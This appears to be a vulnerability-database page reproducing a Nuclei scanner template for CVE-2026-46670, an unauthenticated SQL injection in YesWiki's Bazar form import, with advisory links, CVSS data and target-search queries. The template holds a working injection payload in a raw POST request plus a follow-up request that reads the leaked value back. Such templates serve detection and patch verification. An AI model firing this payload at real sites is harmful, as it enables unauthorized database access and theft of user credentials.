| Reporter | Title | Published | Views | Family All 6 |
|---|---|---|---|---|
| CVE-2026-46670 | 25 May 202623:11 | – | circl | |
| CVE-2026-46670 | 22 May 202615:39 | – | cve | |
| YesWiki: Unauthenticated SQL Injection | 22 May 202615:39 | – | github | |
| GHSA-JWVV-QR7Q-CV8J YesWiki: Unauthenticated SQL Injection | 22 May 202615:39 | – | osv | |
| PT-2026-42810 | 22 May 202600:00 | – | ptsecurity | |
| SQL Injection | 22 May 202615:39 | – | snyk |
id: CVE-2026-46670
info:
name: YesWiki < 4.6.4 - Unauthenticated SQL Injection
author: 0x_Akoko
severity: critical
description: |
YesWiki before version 4.6.4 contains an unauthenticated SQL injection vulnerability in the Bazar form-import path. The bn_id_nature parameter in FormManager::create() is concatenated into an INSERT statement without sanitization, allowing unauthenticated attackers to inject arbitrary SQL and read the full database including password hashes.
impact: |
An unauthenticated attacker can dump the entire database contents including usernames, emails, and hashed passwords from the yeswiki_users table.
remediation: |
Update YesWiki to version 4.6.4 or later.
reference:
- https://github.com/YesWiki/yeswiki/security/advisories/GHSA-jwvv-qr7q-cv8j
- https://nvd.nist.gov/vuln/detail/CVE-2026-46670
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2026-46670
epss-score: 0.0004
epss-percentile: 0.1263
cwe-id: CWE-89
metadata:
verified: true
max-request: 3
vendor: yeswiki
product: yeswiki
shodan-query: http.html:"YesWiki"
fofa-query: body="YesWiki"
tags: cve,cve2026,yeswiki,sqli,unauth,intrusive
variables:
label: "nuclei_{{rand_text_alphanumeric(8)}}"
flow: http(1) && http(2) && http(3)
http:
- method: GET
path:
- "{{BaseURL}}/?BazaR&vue=formulaire"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_any(to_lower(body), "bazar", "yeswiki")'
internal: true
condition: and
- raw:
- |
POST /?BazaR&vue=formulaire HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
imported-form%5B7790000%2BASCII%28SUBSTRING%28VERSION%28%29%2C1%2C1%29%29%5D=%7B%22bn_label_nature%22%3A%22{{label}}%22%2C%22bn_template%22%3A%22%22%2C%22bn_description%22%3A%22%22%2C%22bn_condition%22%3A%22%22%7D
matchers:
- type: dsl
dsl:
- 'status_code == 200 || status_code == 302'
internal: true
condition: and
- raw:
- |
GET /?api/forms HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'regex("\"779004[89]\":\\{|\"779005[0-7]\":\\{", body)'
- 'contains(content_type, "application/json")'
condition: and
extractors:
- type: regex
part: body
group: 1
regex:
- '"(779004[89]|779005[0-7])":\{"bn_id_nature"'
# digest: 490a0046304402207a19b992267f23ebf0cb704b1d62b815df0108cbf3a8f652f94c55c3aab64cc902202fda87145c891055fe0410c45490260a7c84489bc41013e4c83826ad9b3badcb:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation